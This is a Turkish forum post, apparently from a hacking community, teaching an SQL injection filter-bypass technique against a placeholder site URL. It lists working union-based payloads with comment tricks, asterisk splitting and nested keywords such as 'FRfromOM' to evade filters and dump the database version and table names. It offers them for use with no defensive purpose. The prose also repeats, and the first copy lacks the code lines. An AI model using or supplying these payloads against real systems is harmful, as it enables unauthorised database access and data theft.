SQL İnjection Bypass Yöntemi ;
Merhaba arkadaşlar bu konumda farklı bir bypass yönteminden bahsedeceğim pek fazla bilinmeyen yöntemlerden bir tanesidir arkadaşlar.
Öncelikle bir sitemiz var he "'a" me ta-Karakter sorgulaması ile hatamızı alıyoruz arkadaşlar bir sonraki işimiz.
"order+by+" komutunu kullanmak olacaktır arkadaşlar.
şimdi ekranımıza hata geliyor tek tek alta iniyoruz arkadaşlar.
Ekranımız düzelti anlıyoruz ki kolon sayımız "9" dur. Devam edelim arkadaşlar.
yapıyoruz ve bekliyoruz ki ekranımıza değerleri verecek fakat ekranımız da hata mevcut Bypasslamaya çalışalım arkadaşlar.
yöntemini denedik işe yaramadı.
yöntemini denedik yine işe yaramadı arkadaşlar.
yöntemi de işe yaramadı arkadaşlar.
yöntemini denedik yinede sorunu aşamıyoruz arkadaşlar işte şimdi burada farklı bir bypass yöntemini göstericem arkadaşlar.
ilk halimize gelip arkadaşlar yeni yöntemimizi deniyoruz.
bypass yöntemi ile geçebildik ve ekrana yansıttı arkadaşlar. Değerlerimizin bir tanesi "2"dir.
2 üzerinden devam edelim arkadaşlar o zaman ;
çekiyoruz ve ekranımıza 5.0.90... Versiyonumuz gelmektedir arkadaşlar devam ediyoruz ;
komutunu uyguluyoruz arkadaşlar ve bekliyoruz ki
tüm tablolar ekrana yansıtsın fakat yine karşımıza bir hata çıkıyor . SQL injection hatasını tekrar ekrana veriyor. Şimdi bunu aşmak için büyük harfler ekliyeceğiz arkadaşlar parçalıyarak.
burada "from","where" sorgularına
parçalıyarak büyük harfler ekledik ve arkadaşlar görüldüğü üzere sorunumuzu aştık. Gerisi artık sizdedir arkadaşlar sırayla devam edebilirsiniz rahat rahat.
Selametle kalın arkadaşlar Bu konum da burada sona ermiştir..
Merhaba arkadaşlar bu konumda farklı bir bypass yönteminden bahsedeceğim pek fazla bilinmeyen yöntemlerden bir tanesidir arkadaşlar.
Öncelikle bir sitemiz var he "'a" me ta-Karakter sorgulaması ile hatamızı alıyoruz arkadaşlar bir sonraki işimiz.
"order+by+" komutunu kullanmak olacaktır arkadaşlar.
Kod:
"site.com/index.php?id=156 order+by+10"
Kod:
"site.com/index.php?id=156 order+by+9"
Kod:
"site.com/index.php?id=156 union+select+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=156 /*!union*/+select+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=156 /*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=156 /*!UnİoN*/+/*!SeLecT*/+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=156 /*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=156 union+select+1,2,3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=156 un*ion+sel*ect+1,2,3,4,5,6,7,8,9"2 üzerinden devam edelim arkadaşlar o zaman ;
Kod:
"site.com/index.php?id=156 un*ion+sel*ect+1,version(),3,4,5,6,7,8,9"
Kod:
"site.com/index.php?id=156 un*ion+sel*ect+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()"tüm tablolar ekrana yansıtsın fakat yine karşımıza bir hata çıkıyor . SQL injection hatasını tekrar ekrana veriyor. Şimdi bunu aşmak için büyük harfler ekliyeceğiz arkadaşlar parçalıyarak.
Kod:
"site.com/index.php?id=156 un*ion+sel*ect+1,group_concat(table_name),3,4,5,6,7,8,9+FRfromOM+information_schema.tables+WHwhereERE+table_schema=database()"parçalıyarak büyük harfler ekledik ve arkadaşlar görüldüğü üzere sorunumuzu aştık. Gerisi artık sizdedir arkadaşlar sırayla devam edebilirsiniz rahat rahat.
Selametle kalın arkadaşlar Bu konum da burada sona ermiştir..
Son düzenleme:
